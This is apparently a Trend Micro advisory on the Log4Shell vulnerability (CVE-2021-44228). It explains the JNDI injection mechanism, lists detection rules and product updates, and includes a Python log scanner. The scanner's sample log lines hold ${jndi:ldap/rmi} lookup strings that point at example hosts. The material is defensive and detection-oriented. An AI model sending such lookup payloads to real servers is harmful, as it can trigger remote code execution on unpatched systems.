Log4Shell Malware Information

    • Updated on: 10 Mar 2022
    • Product/Version:
    • Operating System:
Summary

On December 9, 2021, a new critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed that, if exploited, could result in Remote Code Execution (RCE) by logging a certain string on affected installations.

This specific vulnerability has been assigned CVE-2021-44228 and is also being commonly referred to as "Log4Shell" in various blogs and reports.

CVE-2021-44228 is a Java Naming and Directory Interface (JNDI) injection vulnerability in affected versions of Log4j 2. It is triggered when a system using an affected version of Log4j 2 includes untrusted data in a logged message. If that data contains a crafted lookup string, Log4j performs a JNDI lookup against the server named in it. Depending on the response sent back, a malicious Java object may be loaded, which can lead to RCE. In short, attackers who can control log messages or their parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
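The detection side of the mechanism described above, as an added example that is not part of the Trend Micro advisory: a small scanner that reads web-server access-log lines in combined format and flags requests whose URI, Referer or User-Agent carries a `${jndi:...}` lookup string. The log lines, IP addresses and hostnames are constructed for the example; the regular expressions and field names are this example's own assumptions, not a Trend Micro rule.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/Nginx combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:08:12:31 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:08:13:02 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A389%2Fa%7D HTTP/1.1" 200 88 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:08:14:10 +0000] "GET /login HTTP/1.1" 302 0 "-" "${jndi:rmi://198.51.100.7:1099/x}"',
    '198.51.100.8 - - [10/Dec/2021:08:15:44 +0000] "POST /api HTTP/1.1" 200 10 "${JNDI:LDAP://lookup.example/y}" "Mozilla/5.0"',
]

# Combined log format: ip ident user [timestamp] "method uri protocol" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A Log4j lookup of the form ${jndi:<scheme>:...}; the scheme (ldap, rmi, dns, ...) is captured for reporting.
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+):', re.IGNORECASE)


def find_jndi_lookups(line):
    """Return a list of (field, scheme) for every JNDI lookup string in the request fields of one line."""
    m = COMBINED_RE.match(line)
    if not m:
        return []  # not a combined-format line; a real deployment would count these separately
    hits = []
    # The server logs the URI percent-encoded; decode it once so an encoded "${" is matched like the raw form.
    fields = {"uri": unquote(m.group("uri")), "referer": m.group("referer"), "ua": m.group("ua")}
    for name, value in fields.items():
        for j in JNDI_RE.finditer(value):
            hits.append((name, j.group("scheme").lower()))
    return hits


def scan_log(lines):
    """Scan log lines and return one finding per line that carried a JNDI lookup string."""
    findings = []
    for line in lines:
        hits = find_jndi_lookups(line)
        if hits:
            m = COMBINED_RE.match(line)
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} JNDI lookup in {f['hits']}")
```

A match here shows only that a lookup string reached a logged field; whether Log4j actually resolved it depends on the application having logged that field with a vulnerable version and message lookups enabled.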

AFFECTED SOFTWARE

  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

INFECTION ROUTINE

Log4Shell Threat Advisory - Infection Routine

AVAILABLE SOLUTIONS

File Reputation

Detection/Policy/Rules | Pattern Branch/Version | Release Date
Trojan.Linux.MIRAI.SEMR, Backdoor.Linux.MIRAI.SMF, Backdoor.Linux.MIRAI.SME | 17.247.00 | 12 Dec 2021
Trojan.SH.CVE20207961.SM | 17.247.00 | 13 Dec 2021
Backdoor.Linux.MIRAI.SEMR, Trojan.SH.MIRAI.MKF, Coinminer.Linux.KINSING.D | 17.248.04 | 13 Dec 2021

Predictive Machine Learning

Detection | Pattern Branch/Version
Troj.ELF.TRX.XXELFC1DFF009 | In-the-cloud
Troj.ELF.TRX.XXELFC1DFF012 | In-the-cloud

Behavior Monitoring

Pattern Branch/Version | Release Date
SEN5985S / TMTD 2565 | 12 Dec 2021

Web Reputation

URL | Category | Blocking Date
URL Protection (Over 1700 URLs blocked) | Malware Accomplice | In-the-cloud

NETWORK PATTERN

Trend Micro Cloud One - Workload Security and Deep Security IPS Rules

  • Rule 1011242 - Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
  • Rule 1005177 - Restrict Java Bytecode File (Jar/Class) Download
  • Rule 1008610 - Block Object-Graph Navigation Language (OGNL) Expressions Initiation In Apache Struts HTTP Request

Trend Micro Cloud One - Workload Security and Deep Security Log Inspection

  • LI Rule 1011241 - Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Trend Micro Cloud One - Network Security and TippingPoint DVToolkit CSW file CVE-2021-44228

  • Filter C1000001 : HTTP: JNDI Injection in HTTP Header or URI

Trend Micro Deep Discovery Inspector

  • Proactive Detection:
    • DDI Rule 4280: "HTTP_POSSIBLE_USERAGENT_RCE_EXPLOIT_REQUEST"
  • Protection Solutions:
    • Released in NCIP 1.14747.00:
      • DDI Rule 4641: "CVE-2021-44228 - OGNL EXPLOIT - HTTP(REQUEST)"
      • DDI Rule 4643: "POSSIBLE HTTP BODY OGNL EXPRESSION EXPLOIT - HTTP (REQUEST) - Variant 2" (disabled by default)
    • Released in NCIP 1.14749.00:
      • DDI Rule 4642: "POSSIBLE HTTP HEADER OGNL EXPRESSION EXPLOIT - HTTP(REQUEST)"
Details

Solution Map - What should customers do?

Cells left empty below were merged with the row above in the original table.

Trend Micro Solutions | Major Products | Latest Versions | Virus Pattern | Anti-Spam Pattern | Network Pattern | Behavior Monitoring | Predictive Machine Learning | Web Reputation
Endpoint Security | Apex One | 2019 (Critical Patch - Server Build 9204 and Agent Build 9179) | Update pattern via web console | Not Applicable | Update pattern via web console | Enable Behavior Monitoring and update pattern via web console | Enable Predictive Machine Learning | Enable Web Reputation Service and update pattern via web console
 | Worry-Free Business Security | Standard (10.0), Advanced (10.0) | Update pattern via web console
Hybrid Cloud Security | Deep Security | 20.0 | Update pattern via web console | Not Applicable | Update pattern via web console | Enable Behavior Monitoring and update pattern via web console | Enable Predictive Machine Learning | Enable Web Reputation Service and update pattern via web console
 | Cloud One - File Storage Security (SaaS) | N/A | Updated Automatically | Not Applicable | Not Applicable | Not Applicable | Not Applicable
 | Cloud One - Application Security (SaaS) | Updated automatically
 | Cloud One - Container Security (SaaS) | Not applicable
Email and Gateway Security | Deep Discovery Email Inspector | 5.1 | Update pattern via web console | Update pattern via web console | Update pattern via web console | Not Applicable | Enable Predictive Machine Learning | Enable Web Reputation Service and update pattern via web console
 | InterScan Messaging Security | 9.1 | Not Applicable | Not Applicable
 | InterScan Web Security / InterScan Web Security Virtual Appliance | 6.5
 | ScanMail for Microsoft Exchange | 14.0
 | Cloud App Security (SaaS) | N/A | Updated Automatically | Updated Automatically | Enable Predictive Machine Learning
 | Hosted Email Security (SaaS)
 | Email Security (SaaS)
Network Security | Deep Discovery Inspector | 5.8 | Update pattern via web console | Not Applicable | Update pattern via web console | Not Applicable | Not Applicable | Enable Web Reputation Service and update pattern via web console

To update Trend Micro products, refer to the Online Help Center.

Recommendations

Threat Reports

Other Information

Category: Remove a Malware / Virus
Solution ID: 000289946